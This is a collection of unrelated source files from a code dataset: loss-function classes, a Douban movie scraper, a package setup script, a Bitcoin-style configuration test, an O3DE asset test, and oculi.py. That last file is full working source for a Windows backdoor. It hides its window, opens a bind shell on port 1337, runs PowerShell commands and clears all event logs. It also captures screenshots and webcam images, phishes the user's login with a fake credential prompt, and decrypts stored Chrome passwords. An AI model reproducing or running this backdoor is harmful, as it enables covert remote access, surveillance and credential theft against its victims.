super(GDL_and_CE_loss, self).__init__()
self.aggregate = aggregate
self.ce = RobustCrossEntropyLoss(**ce_kwargs)
self.dc = GDL(softmax_helper, **gdl_dice_kwargs)
def forward(self, net_output, target):
dc_loss = self.dc(net_output, target)
ce_loss = self.ce(net_output, target)
if self.aggregate == "sum":
result = ce_loss + dc_loss
else:
raise NotImplementedError("nah son") # reserved for other stuff (later)
return result
class DC_and_topk_loss(nn.Module):
def __init__(self, soft_dice_kwargs, ce_kwargs, aggregate="sum", square_dice=False):
super(DC_and_topk_loss, self).__init__()
self.aggregate = aggregate
self.ce = TopKLoss(**ce_kwargs)
if not square_dice:
self.dc = SoftDiceLoss(apply_nonlin=softmax_helper, **soft_dice_kwargs)
else:
self.dc = SoftDiceLossSquared(apply_nonlin=softmax_helper, **soft_dice_kwargs)
def forward(self, net_output, target):
dc_loss = self.dc(net_output, target)
ce_loss = self.ce(net_output, target)
if self.aggregate == "sum":
result = ce_loss + dc_loss
else:
raise NotImplementedError("nah son") # reserved for other stuff (later?)
return result
| 32.171733 | 121 | 0.570457 |
ace94a7c8f51ad1f558855737cbe49484ed53542 | 9,928 | py | Python | DouBanMovie/douban.py | MashiMaroLjc/ML-and-DM-in-action | 1c1230267768c0caf0a496e6d9d2558f2876c384 | [
"Apache-2.0"
] | 370 | 2016-04-28T13:59:00.000Z | 2022-02-18T10:37:54.000Z | DouBanMovie/douban.py | rotman173/ML-and-DM-in-action | 1c1230267768c0caf0a496e6d9d2558f2876c384 | [
"Apache-2.0"
] | 8 | 2016-05-06T10:55:40.000Z | 2019-05-30T05:06:03.000Z | DouBanMovie/douban.py | rotman173/ML-and-DM-in-action | 1c1230267768c0caf0a496e6d9d2558f2876c384 | [
"Apache-2.0"
] | 177 | 2016-05-07T18:03:29.000Z | 2021-04-13T09:41:59.000Z | #coding:utf-8
#多一个线程时不时序列化
#{
# visited
# n
#}
#载入时自动使viited.pop()作为最新的url
#n = num
#提供一些爬取豆瓣的api
import requests
from bs4 import BeautifulSoup
from queue import Queue
import threading
import re
import time
import os.path
import json
import random
HEADER={
"Host": "movie.douban.com",
"scheme":"https",
"version":"HTTP/1.1",
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q = 0.8",
"accept-encoding":"gzip,deflate,sdch",
"accept-language":"zh-CN,zh;q=0.8",
"cache-control":"max-age=0",
"cookie":'',#add your cookie
"referer":"https://book.douban.com/subject/26757148/?icn=index-editionrecommend",
"upgrade-insecure -requests":"1",
"user-agent":"Mozilla / 5.0(WindowsNT6.3;"\
"WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 48.0.2564.116Safari / 537.36"
}
import logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='spider.log',
filemode='a')
class myQueue(Queue):
def __init__(self,type1=None,type2=None):
super().__init__()
#return list
def to_list(self):
copy_list = []
length = self.qsize()
for x in range(length):
value = self.get()
copy_list.append(value)
self.put(value)
return copy_list
class DouBanMovieSpider:
def __init__(self):
self._visited =[]
self._n = 1
self._url = "https://movie.douban.com/"
self._mutex = threading.Lock()
self._threading_flag = True
self._mission = myQueue()
#读入文件的配置
def configure(self,filename):
fp = open(filename,'r')
js = json.load(fp)
fp.close()
self._visited = js.get("visited",[])
self._n = int(js.get("n",1))
mission_list = js.get("mission",myQueue())
if isinstance(mission_list,myQueue):
self._mission = mission_list
else:
for url in mission_list:
self._mission.put(url)
if len(self._visited) >= 1:
self._url = self._visited.pop()
print("now have %d mission totally"%(self._mission.qsize()))
#周期检查,如果查找满了50 条,则序列化
def _check(self):
temp = -1
while self._threading_flag:
# print(self._n)
flag = False
length = len(self._visited)
if (length % 15 ==0) and temp != length:
flag = True
temp = length
if flag :
if self._mutex.acquire():
try:
#print("写入!")
fp = open("info.txt","w")
json.dump({
"visited":self._visited,
"n":length,
"mission":self._mission.to_list()
},fp)
fp.close()
logging.info("Write information succeed!")
except Exception as err:
logging.info("Check Error %s"%(str(err)))
self._mutex.release()
time.sleep(1)
fp = open("info.txt","w")
json.dump({
"visited":self._visited,
"n":len(self._visited),
"mission":self._mission.to_list()
},fp)
fp.close()
#提取出最新的电影
def _new_movie(self,html):
#print(html)
soup = BeautifulSoup(html,"html.parser")
li_list = soup.find_all('li')
new_movie_list = []
for li in li_list:
if li.get("data-title"):
title = li.get("data-title","unknown")
release = li.get("data-release","unknown")
duration = li.get("data-duration","unknown")
region = li.get("data-region","unknown")
director = li.get("data-director","unknown")
actors = li.get("data-actors","unknown")
new_movie_list.append(
(title,release,duration,region,director,actors)
)
return new_movie_list
#获取最新电影
def get_new_movie(self,timeout=5):
response = requests.get("https://movie.douban.com/", headers=HEADER,timeout=timeout)
if str(response.status_code) == '200':
response.encoding="utf-8"
html = response.text
movie_info_list = self._new_movie(html)
return movie_info_list
else:
return []
#从html页面内获取电影信息,以列表的方式返回
def _get_info(self,html):
soup = BeautifulSoup(html, "html.parser")
span = soup.find("span",attrs={"property":"v:itemreviewed"})
#title
try:
title = span.string
except Exception:
title = ""
# span2 = soup.find("span",attrs={"class":"year"})
# #year
# year = span2.string
#导演名字
d_a = soup.find("a",attrs={"rel":"v:directedBy"})
try:
d_name = d_a.string
except Exception:
d_name = ""
#编剧名字列表
w_list = soup.find_all(href = re.compile("/celebrity/\d{7}/"),attrs={"rel":""})
try:
w_name_list = [name.string for name in w_list]
except Exception:
w_name_list = [""]
#主演名字列表
actor_list = soup.find_all(attrs={"rel":"v:starring"})
try:
actor_name_list = [name.string for name in actor_list]
except Exception:
actor_name_list = [""]
#电影类型
movie_type_span = soup.find("span",attrs={"property":"v:genre"})
try:
movie_type_name = movie_type_span.string
except Exception:
movie_type_name = ""
#片长
runtime_span = soup.find("span",attrs={"property":"v:runtime"})
try:
runtime = runtime_span.string
except Exception:
runtime = ""
#地区
area_index = html.find("制片国家/地区:</span>")
end_index = html.find("br",area_index)
if area_index != -1 and end_index != -1:
area = html[area_index+16:end_index-1]
else:
area = ""
#具体上映日期
date_span = soup.find("span",attrs={"property":"v:initialReleaseDate"})
try:
date = date_span.string
except Exception:
date = ""
#评分
star_strong = soup.find("strong",attrs={"property":"v:average"})
try:
star = star_strong.string
except Exception:
star = "-1"
#影评区
comment_div_list = soup.find_all("div",attrs={"class":"comment"})
#筛选出纯影评
def _get_comment(tag):
try:
return tag.p.string.replace(" ","").replace("\n","")
except Exception:
return ""
comment_list = [_get_comment(comment) for comment in comment_div_list]
#print(comment_div_list)
#电影信息归结
info = {
"title":title,
"director":d_name,
"writer":"/".join(w_name_list),
"actor":"/".join(actor_name_list),
"type":movie_type_name,
"runtime":runtime,
"area":area,
"date":date,
"star":star,
"comment_list":comment_list
}
return info
#从电影url中获取信息
def get_info_from_movie(self,url,timeout=5):
response = requests.get(url, headers=HEADER, timeout=timeout)
if str(response.status_code) == '200':
response.encoding = "utf-8"
html = response.text
return self._get_info(html)
else:
return dict()
#从主页中提取出需要爬取得url,返回其列表
def _get_movie_url(self,html):
#主页入口
exp = "https://movie.douban.com/subject/\d{8}/\?from"
soup = BeautifulSoup(html,"html.parser")
movie_list = soup.find_all("a",href=re.compile(exp))
url_list = [movie.get("href") for movie in movie_list]
return url_list
#将info序列化,写进n.txt
def _write_file(self,dirname,info,n):
filename = os.path.join(dirname,"{}.txt".format(n))
f = open(filename,'w')
json.dump(info,f)
f.close()
#spider内部实现函数
def _spider(self,dirname,mission,timeout,num):
record = dict()#(value:time out number,key:url)
#爬取
while (not mission.empty() )and ((self._n <= num) or (num == -1)):
url = mission.get(timeout=5)
try:
if url not in self._visited:
response = requests.get(url,headers=HEADER,timeout=timeout)
else:
logging.info("%s is in %s"%(url,self._visited.index(url)))
continue
except Exception as err:
#曾经的错误次数
was = record.get(url,0)
# if was == 5:
# logging.error(url + " Give Up!\n")
# time.sleep(5)
# continue
#print("\n%s error !\nError is %s!\n Wait a moment!"%(url,str(err)))
logging.error("%s error !\nError is %s!\n Wait a moment!\n"%(url,str(err)))
time.sleep(10)
mission.put(url)
record[url] = was + 1
else:
if str(response.status_code) != '200':
logging.error("url:%s The code is %s"%(url,response.status_code))
was = record.get(url, 0)
if was == 2:
logging.error(url + " Give Up!\n")
time.sleep(5)
continue
mission.put(url)
time.sleep(10)
record[url] = was + 1
# logging.error(url + " Give Up!\n")
continue
else:
#成功访问
response.encoding = "utf-8"
html = response.text
next_url_list = self._get_movie_url(html)
for next_url in next_url_list:
mission.put(next_url)
try:
info = self._get_info(html)
# for key,value in info.items():
# print(key," : ",value)
self._write_file(dirname,info,self._n)
except Exception as err:
logging.error("URL: %s Get information error! Reason: "%(url)+str(err))
#was = record.get(url, 0)
# if was == 2:
# logging.error(url + " Give Up!\n")
# time.sleep(5)
# continue
#mission.put(url)
time.sleep(10)
#record[url] = was + 1
else:
#print("%s succeed! Already finish %d/%d"%(url,self._n,num))
logging.info("%s succeed! Already finish %d/%d\n"%(url,self._n,num))
if self._mutex.acquire():
#print("append")
self._visited.append(url)
self._mutex.release()
self._n += 1
time.sleep(random.randrange(10,22,1))
#在dirname下建立收集下来的库
def spider(self,dirname,timeout=5,num=-1):
#开启检测进程
check_t = threading.Thread(target=self._check,name="check")
check_t.start()
#打开主页
response = requests.get(self._url,headers=HEADER,timeout=timeout)
if str(response.status_code) != '200':
print("Begin Failed!")
response.encoding="utf-8"
html = response.text
movie_url = self._get_movie_url(html)
#print(movie_url)
for url in movie_url:
self._mission.put(url,timeout=5)
self._spider(dirname=dirname,mission=self._mission,timeout=timeout,num=num)
self._threading_flag = False
# if __name__ == '__main__':
# # f = open("123.html",'r',encoding='utf-8')
# # html = f.read()
# # f.close()
# d = DouBanMovieSpider()
# # res = d._get_movie_url(html)
# # print(res)
# # info = d._get_info(html)
# # for key,value in info.items():
# # print(key+": "+str(value))
# # res = d.get_new_movie()
# # for movie in res:
# # print(movie)
# d.spider("F://doubandata",num=10) | 25.587629 | 97 | 0.636785 |
ace94b0061d1a5336a70247cba3984c682a0cb38 | 583 | py | Python | setup.py | MiLL4U/ibwpy | fc73c165af8445f97106edbeadcf340987e1d508 | [
"MIT"
] | null | null | null | setup.py | MiLL4U/ibwpy | fc73c165af8445f97106edbeadcf340987e1d508 | [
"MIT"
] | null | null | null | setup.py | MiLL4U/ibwpy | fc73c165af8445f97106edbeadcf340987e1d508 | [
"MIT"
] | null | null | null | import setuptools
def _requires_from_file(filename):
return open(filename).read().splitlines()
setuptools.setup(
name="ibwpy",
version="1.0.0",
install_requires=_requires_from_file('requirements.txt'),
author="Hiroaki Takahashi",
author_email="aphiloboe@gmail.com",
description="Edit Igor Pro binary wave files",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.7',
)
| 27.761905 | 61 | 0.670669 |
ace94b9b9b801ef21a9b5c40c5e3dc0f613b53f5 | 15,202 | py | Python | src/oculi.py | spicesouls/oculi | d2594a99f78bb13a1b5e469d08bfebc435b49661 | [
"MIT"
] | 6 | 2021-04-17T22:22:00.000Z | 2021-08-30T09:29:36.000Z | src/oculi.py | spicesouls/oculi | d2594a99f78bb13a1b5e469d08bfebc435b49661 | [
"MIT"
] | null | null | null | src/oculi.py | spicesouls/oculi | d2594a99f78bb13a1b5e469d08bfebc435b49661 | [
"MIT"
] | 1 | 2021-08-07T12:55:02.000Z | 2021-08-07T12:55:02.000Z | from colorama import init, Fore, Style, Back
init()
red = '\033[38;5;196m'
yellow = '\033[38;5;226m'
banner = rf'''{red}
▄██████▄ ▄████████ ███ █▄ ▄█ ▄█ {yellow}(v1.0){red}
███ ███ ███ ███ ███ ███ ███ ███
███ ███ ███ █▀ ███ ███ ███ ███▌
███ ███ ███ ███ ███ ███ ███▌
███ ███ ███ ███ ███ ███ ███▌
███ ███ ███ █▄ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ███▌ ▄ ███
▀██████▀ ████████▀ ████████▀ █████▄▄██ █▀
----------- {yellow}developed by spicesouls{red} -----------
''' + Style.RESET_ALL
import socket
import subprocess
import os
import sys
import json
import base64
import random
import win32api
import win32console
import win32gui
import win32crypt
import platform
import re
import pygame
import pygame.camera
import sqlite3
from Crypto.Cipher import AES
from datetime import timezone, datetime, timedelta
import uuid
import getpass
import shutil
import psutil
PORT=1337
screenshotpscode = '''[Reflection.Assembly]::LoadWithPartialName("System.Drawing"); function screenshot([Drawing.Rectangle]$bounds, $path) {$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height; $graphics = [Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size); $bmp.Save($path); $graphics.Dispose(); $bmp.Dispose()}; $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, SYSTEMMETRICSONE, SYSTEMMETRICSTWO); screenshot $bounds "PATH2REPLACE"'''
phishpscode = '''while($true){$credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "");if($credential){$creds = $credential.GetNetworkCredential(); [String]$user = $creds.username; [String]$pass = $creds.password; Set-Content $env:temp\\fish.txt $user":"$pass; break}}'''
def hideconsole():
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)
def startbackdoor():
# Bind to Host & IP
while True:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(('0.0.0.0', PORT))
s.listen()
conn, addr = s.accept()
with conn:
conn.send(bytes(banner,'utf-8'))
while True:
conn.send(bytes(f'{yellow}{getpass.getuser()}{Fore.RESET}@{red}Oculi{Fore.RESET} {Style.BRIGHT}>>{Style.RESET_ALL} ','utf-8'))
instruction = conn.recv(4096).decode().strip()
if not instruction:
break
elif instruction == 'help':
conn.send(bytes(Style.BRIGHT + r'''
HELP
-====-''' + Style.RESET_ALL + r'''
help ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Displays this message
shell ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Drop into a Shell
whoami ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Get Current User
sysinfo ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Get System Info
pid ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Get Process ID
banner ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Display the banner
ping ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Get the Network Ping Latency
clearlog ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Wipe Windows Event Logs
screenshot ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Take a Screenshot of the Main Display
webcam ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Take a Photo through an availabe webcam
phish ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Phish the user for their credentials
chrome ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Steal Chrome Passwords
exit ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Exit Oculi (Does not kill the program)
kill ''' + Style.BRIGHT + r'''::''' + Style.RESET_ALL + r''' Kill Oculi
''','utf-8'))
elif instruction == 'shell':
conn.send(bytes(Style.BRIGHT + "Type 'exit' to leave the shell.\n" + Style.RESET_ALL,'utf-8'))
while True:
pwd = bytes(os.getcwd(), 'utf-8')
conn.send(b'PS ' + pwd + b'> ')
data = conn.recv(4096)
if data.decode('utf-8')[:2] == 'cd':
os.chdir(data.decode('utf-8').replace('\n','')[3:])
elif data.decode().lower().strip() == 'exit':
break
else:
if data.decode().strip() != '':
try:
result = subprocess.getoutput('powershell.exe ' + data.decode().strip()) + '\n'
conn.send(bytes(result,'utf-8'))
except Exception as e:
conn.send(bytes('Error: ' + str(e) + '\n','utf-8'))
else:
pass
elif instruction == 'whoami': conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + subprocess.getoutput('whoami') + '\n','utf-8'))
elif instruction == 'sysinfo':
conn.send(bytes(rf'''{Style.BRIGHT}
+---- System Info ----+{Style.RESET_ALL}
System {Style.BRIGHT}:{Style.RESET_ALL} {platform.system()}
Version {Style.BRIGHT}:{Style.RESET_ALL} {platform.version()}
Arch {Style.BRIGHT}:{Style.RESET_ALL} {platform.machine()}
Hostname {Style.BRIGHT}:{Style.RESET_ALL} {socket.gethostname()}
IP {Style.BRIGHT}:{Style.RESET_ALL} {addr[0]}
MAC {Style.BRIGHT}:{Style.RESET_ALL} {':'.join(re.findall('..', '%012x' % uuid.getnode()))}
Processor {Style.BRIGHT}:{Style.RESET_ALL} {platform.processor()}
RAM {Style.BRIGHT}:{Style.RESET_ALL} {str(round(psutil.virtual_memory().total / (1024.0 **3)))+" GB"} {Style.BRIGHT}
+---------------------+{Style.RESET_ALL}
''','utf-8'))
elif instruction == 'pid':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'PID: {str(os.getpid())}\n','utf-8'))
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'PPID: {str(os.getppid())}\n','utf-8'))
elif instruction == 'banner': conn.send(bytes(banner,'utf-8'))
elif instruction == 'ping':
param = '-n' if platform.system().lower()=='windows' else '-c'
pingcommand = ['ping', param, '1', addr[0]]
pingresult = subprocess.check_output(pingcommand)
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Pinging Client IP...\n','utf-8'))
conn.send(pingresult + b'\n')
elif instruction == 'clearlog':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Getting Event Logs...\n','utf-8'))
eventlogs = subprocess.getoutput('wevtutil el').split('\n')
conn.send(bytes(f'\tFound {Style.BRIGHT}{str(len(eventlogs))}{Style.RESET_ALL} Event Logs.\n','utf-8'))
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Clearing Windows Logs...\n','utf-8'))
subprocess.check_output(["powershell.exe", """wevtutil el | Foreach-Object {wevtutil cl "$_"}"""])
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Finished!\n','utf-8'))
elif instruction == 'screenshot':
scnpath = os.getenv('TEMP')
scnpath += '\cache.png'
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Path: ' + Style.BRIGHT + scnpath + Style.RESET_ALL + '\n', 'utf-8'))
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Executing Powershell...\n','utf-8'))
subprocess.check_output(["powershell.exe", screenshotpscode.replace('PATH2REPLACE',scnpath).replace('SYSTEMMETRICSONE',str(win32api.GetSystemMetrics(0))).replace('SYSTEMMETRICSTWO',str(win32api.GetSystemMetrics(1)))])
conn.send(bytes(Fore.GREEN + '\n[+] ' + Fore.RESET + 'Success! Screenshot saved to ' + scnpath + '\n','utf-8'))
elif instruction == 'webcam':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Checking for Webcams...\n','utf-8'))
try:
pygame.camera.init()
cam = pygame.camera.Camera(0,(640,480))
cam.start()
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Getting Picture through Webcam...\n','utf-8'))
img = cam.get_image()
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Saving image to {os.getenv("TEMP")}\\webcam-cache.jpg ...\n','utf-8'))
pygame.image.save(img,os.getenv("TEMP") + "\\webcam-cache.jpg")
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Done! Closing Camera...\n','utf-8'))
cam.stop()
except Exception as e:
conn.send(bytes(Fore.RED + '[+] ' + Fore.RESET + f'Error finding/using a Webcam ({str(e)})\n','utf-8'))
elif instruction == 'phish':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Starting Phishing Window, Waiting for Target Input...\n', 'utf-8'))
subprocess.getoutput(['powershell.exe', phishpscode])
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Checking For Phishing Results...\n', 'utf-8'))
try:
with open(os.getenv('TEMP') + '\\fish.txt','r') as o:
phishresults = o.read()
o.close()
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Success! Phishing Results:\n\n', 'utf-8'))
conn.send(bytes(phishresults,'utf-8') + b'\n')
except:
conn.send(bytes(Fore.RED + '[+] ' + Fore.RESET + 'Failure, Results not found\n', 'utf-8'))
elif instruction == 'chrome':
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Attempting to Locate Chrome DB...\n','utf-8'))
chromelogins = []
def get_chrome_datetime(chromedate): return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
def get_encryption_key():
local_state_path = os.path.join(os.environ["USERPROFILE"],
"AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
key = key[5:]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(password, key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return ""
key = get_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + 'Reading Chrome DB...\n','utf-8'))
db = sqlite3.connect(filename)
cursor = db.cursor()
# `logins` table has the data we need
cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = decrypt_password(row[3], key)
if username or password: chromelogins.append({"origin":origin_url,"action":action_url,"username":username,"password":password})
else: continue
cursor.close(); db.close()
try: os.remove(filename)
except: pass
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Done! {Style.BRIGHT}{str(len(chromelogins))}{Style.RESET_ALL} Logins Found\n','utf-8'))
with open(os.getenv('TEMP') + '\\chrome-cache.txt','w') as o:
for login in chromelogins:
o.write(f'''Created At: {login["origin"]}\nLogin Used At: {login["action"]}\nUsername: {login["username"]}\nPassword: {login["password"]}\n\n''')
o.close()
conn.send(bytes(Fore.GREEN + '[+] ' + Fore.RESET + f'Logins written to {os.getenv("TEMP")}\\chrome-cache.txt\n','utf-8'))
elif instruction == 'exit':
conn.send(b'\n Bye Bye!\n')
conn.close()
break
elif instruction == 'kill':
conn.send(b'Are you sure you want to kill Oculi? [Y/N]\n > ')
confirmation = conn.recv(4096).decode().strip().upper()
if confirmation == 'Y':
conn.send(b'\n Killing Oculi...\n')
conn.close()
sys.exit()
else: conn.send(bytes(Fore.RED + '[+] ' + Fore.RESET + 'Command not found.\n', 'utf-8'))
hideconsole()
startbackdoor()
| 64.415254 | 510 | 0.476582 |
ace94c1f2eaac40263207f8675b6d46a4288c23f | 2,329 | py | Python | test/functional/feature_config_args.py | curvehashcoin/CurvehashCoin | 463e7bd7c8d1dea21e123ef7f9838c04ecb07f1f | [
"MIT"
] | 6 | 2020-11-30T05:50:48.000Z | 2021-07-07T18:30:08.000Z | test/functional/feature_config_args.py | curvehashcoin/CurvehashCoin | 463e7bd7c8d1dea21e123ef7f9838c04ecb07f1f | [
"MIT"
] | 2 | 2020-12-19T23:47:44.000Z | 2021-05-26T13:50:31.000Z | test/functional/feature_config_args.py | curvehashcoin/CurvehashCoin | 463e7bd7c8d1dea21e123ef7f9838c04ecb07f1f | [
"MIT"
] | 2 | 2020-11-14T22:25:22.000Z | 2020-11-16T02:57:46.000Z | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test various command line arguments and configuration file parameters."""
import os
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import get_datadir_path
class ConfArgsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
self.stop_node(0)
# Remove the -datadir argument so it doesn't override the config file
self.nodes[0].args = [arg for arg in self.nodes[0].args if not arg.startswith("-datadir")]
default_data_dir = get_datadir_path(self.options.tmpdir, 0)
new_data_dir = os.path.join(default_data_dir, 'newdatadir')
new_data_dir_2 = os.path.join(default_data_dir, 'newdatadir2')
# Check that using -datadir argument on non-existent directory fails
self.nodes[0].datadir = new_data_dir
self.assert_start_raises_init_error(0, ['-datadir='+new_data_dir], 'Error: Specified data directory "' + new_data_dir + '" does not exist.')
# Check that using non-existent datadir in conf file fails
conf_file = os.path.join(default_data_dir, "curvehash.conf")
with open(conf_file, 'a', encoding='utf8') as f:
f.write("datadir=" + new_data_dir + "\n")
self.assert_start_raises_init_error(0, ['-conf='+conf_file], 'Error reading configuration file: specified data directory "' + new_data_dir + '" does not exist.')
# Create the directory and ensure the config file now works
os.mkdir(new_data_dir)
self.start_node(0, ['-conf='+conf_file, '-wallet=w1'])
self.stop_node(0)
assert os.path.isfile(os.path.join(new_data_dir, 'regtest', 'wallets', 'w1'))
# Ensure command line argument overrides datadir in conf
os.mkdir(new_data_dir_2)
self.nodes[0].datadir = new_data_dir_2
self.start_node(0, ['-datadir='+new_data_dir_2, '-conf='+conf_file, '-wallet=w2'])
assert os.path.isfile(os.path.join(new_data_dir_2, 'regtest', 'wallets', 'w2'))
if __name__ == '__main__':
ConfArgsTest().main()
| 46.58 | 169 | 0.694289 |
ace94d074ddf35887bce34e3c05b618f16636e0f | 10,983 | py | Python | Gem/PythonTests/Automated/test_suites/periodic/AssetCollectionLoadManager_test_case.py | incisor/o3de-atomtest | 026fef06827bf0dd559510882df5cb426ab00a99 | [
"Apache-2.0",
"MIT"
] | 2 | 2021-07-18T11:20:41.000Z | 2022-02-01T20:17:50.000Z | Gem/PythonTests/Automated/test_suites/periodic/AssetCollectionLoadManager_test_case.py | incisor/o3de-atomtest | 026fef06827bf0dd559510882df5cb426ab00a99 | [
"Apache-2.0",
"MIT"
] | 5 | 2021-07-14T02:24:07.000Z | 2021-10-04T21:24:35.000Z | Gem/PythonTests/Automated/test_suites/periodic/AssetCollectionLoadManager_test_case.py | incisor/o3de-atomtest | 026fef06827bf0dd559510882df5cb426ab00a99 | [
"Apache-2.0",
"MIT"
] | 7 | 2021-07-06T18:21:14.000Z | 2021-12-06T09:12:40.000Z | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
Hydra script that is used to test the AssetCollectionAsyncLoader class inside the Editor.
This class detects when assets have been processed and loads them in memory - all loading is done asynchronously.
If this test fails be sure to review asset logs for asset failures.
See the run() function for more in-depth test info.
There are also in-line comments for each function detailing specific interactions as well as docstrings.
"""
import os
import sys
import shutil
from functools import partial
import azlmbr.bus as bus
import azlmbr.editor as editor
import azlmbr.test as aztest
import azlmbr.legacy.general as general
import azlmbr.math as math
import azlmbr.paths
import azlmbr.asset as asset
from azlmbr.entity import EntityId
sys.path.append(os.path.join(azlmbr.paths.devassets, "Gem", "PythonTests"))
from Automated.atom_utils.automated_test_utils import TestHelper as helper
def GetAssetsLists():
"""
Returns a tuple that contains three lists
1. The first list is TXT source assets list.
File paths in this list end in ".txt" to avoid being processed.
These assets come from the code repository.
2. The second list is the TEMP source assets list. These represent
temporary assets that will live for the duration of this test suite.
The Asset Processor will be able to detect that these assets
exist and will proceed to generate product assets from them.
3. The third list is the products list.
"""
srcNames = (
("ShaderBlendingOn.azsl.txt", "ShaderBlendingOn.azsl"),
("azshader-ShaderBlendingOn.shader.txt", "ShaderBlendingOn.shader"),
("streamingimage-checker8x8_512.png.txt", "checker8x8_512.png"),
("azmodel-cube_multimat_no_textures.fbx.txt", "cube_multimat_no_textures.fbx"),
("azmodel-cube.fbx.txt", "cube.fbx"),
)
productNames = (
"ShaderBlendingOn.azshader",
"checker8x8_512.png.streamingimage",
"cube_multimat_no_textures.azmodel",
"cube.azmodel",
)
gameRootPath = general.get_game_folder()
srcTextFolder = os.path.normpath("Gem/PythonTests/Automated/TestData/AsyncAssetLoadTest") # Relative to gameRootPath
dstSourceAssetFolder = os.path.normpath("TempData/AsyncAssetLoadTest") #relative to gameRootPath folder AND asset cache.
sourceTxtList = []
sourceTempList = []
for sourceNameTxt, sourceName in srcNames:
sourceTxtList.append(os.path.join(gameRootPath, srcTextFolder, sourceNameTxt))
sourceTempList.append(os.path.join(gameRootPath, dstSourceAssetFolder, sourceName))
productList = []
for productName in productNames:
productList.append(os.path.join(dstSourceAssetFolder, productName))
return sourceTxtList, sourceTempList, productList
def CreateEntityWithComponent(entityName, componentClassName):
"""
Creates an entity with the given name if it doesn't exist.
Proceeds to attach a component with the given class name if not attached already to the entity.
Returns the EntityId
"""
#See if an entity with such name exists.
entityList = helper.find_entities(entityName)
if len(entityList) < 1:
# Create new entity
myEntityId = editor.ToolsApplicationRequestBus(bus.Broadcast, 'CreateNewEntity', EntityId())
editor.EditorEntityAPIBus(bus.Event, 'SetName', myEntityId, entityName)
if myEntityId.IsValid():
general.log("Entity successfully created.")
else:
general.log(f"Failed to create entity with name {entityName}.")
return None
else:
myEntityId = entityList[0]
general.log(f"Found entity with name {entityName}.")
# Add the component if not added already.
if helper.attach_component_to_entity(myEntityId, componentClassName) is None:
general.log(f"ERROR: Failed to add component [{componentClassName}] to entity named [{entityName}]")
return None
return myEntityId
def DeleteFilesInList(sourceTempList):
for filePath in sourceTempList:
try:
os.remove(filePath)
except:
pass
